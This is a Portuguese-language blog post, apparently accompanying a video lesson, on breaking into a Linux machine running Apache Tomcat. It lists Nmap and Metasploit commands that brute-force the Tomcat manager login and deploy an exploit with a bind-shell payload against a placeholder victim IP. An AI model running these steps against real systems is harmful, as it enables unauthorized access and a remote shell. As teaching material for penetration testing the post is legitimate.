• homepost1

  • homepost4

  • homepost2

  • homepost5

  • homepost3

  • homepost6

  • homepost7

Invasão em micro Linux

Nessa aula mostro como explorar um serviço rodando em um micro Linux. O serviço era do apache tomcat. Para maiores informações do mesmo clique aqui!

O que eu fiz?
Escanei o host com o Nmap,
verifiquei os serviço,
fiz um scanner com o metasploit para verifica vulnerabilidade do login, peguei o login e senha e injetei o exploit.

Comandos:


Citação:

nmap -sV host
use scanner/http/tomcat_mgr_login
set rhost Ip_da_vitima
set rport 8180
exploit

use multi/http/tomcat_mgr_deploy
set rhost Ip_da_vitima
set username Login_capturado
set passwoer Senha_capturada
set rport 8180
set payload linux/x86/shell_bind_tcp
exploit
Programas usados:
Metasploit
Nmap

Ambiente da aula e em uma distro Linux, lembrando que pode ser em qualquer sistema operacional que rode o metasploit.

Obs: O pessoal ja engessou que sistema operacional linux e seguro que Windows e vulnerável. O Linux da uma camada a mais de segurança, mas possui vulnerabilidades também. Sempre atualize.

Baixar:

Assisti on-line:

Citação:

http://bhior.blip.tv/file/3689430

Filed Under: ,

About the Author

My name is Dinh Quang Huy or known as alias NhamNgaHanh .I made this template in magazine style and named it Simplex Darkness .I hope it helpful to persons who want a solutions for a template in Blogspot.To download this template and see template install instruction ,go to Simplex Design blog.

1 comment

Trackback URL | Comments RSS Feed

  1. Anonymous says:

    Bhior, muito bom! se puder disponibilizar mais da série invasão em linux.

    OBRIGADO!
    abraço.

     

Leave a Reply